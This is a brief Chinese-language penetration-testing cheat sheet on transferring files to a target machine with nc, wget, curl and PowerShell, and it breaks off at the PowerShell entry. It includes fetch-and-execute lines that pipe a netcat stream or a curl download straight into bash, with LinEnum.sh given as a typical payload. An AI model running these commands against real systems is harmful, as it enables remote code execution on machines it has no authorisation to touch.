File Transfer Cheat Sheet

0x01 通用

NC

# 本地
cat ${file}|nc -lnvp port
# 目标机
nc ip port >> ${file}
# 执行 bash 的话
nc ip port | bash

0x02 Linux

Wget

# 下载文件
wget http://domain/file
# 下载目录下所有文件
wget -r http://domain/dir

Curl

# 下载另存为
curl http://domain/file -o file
# 下载并执行 (常用 curl http://domain/LinEnum.sh | bash)
curl http://domain/file.sh | bash

0x03 Windows

Wget

wget -Uri http://domain/file -OutFile file

Powershell

powershell ...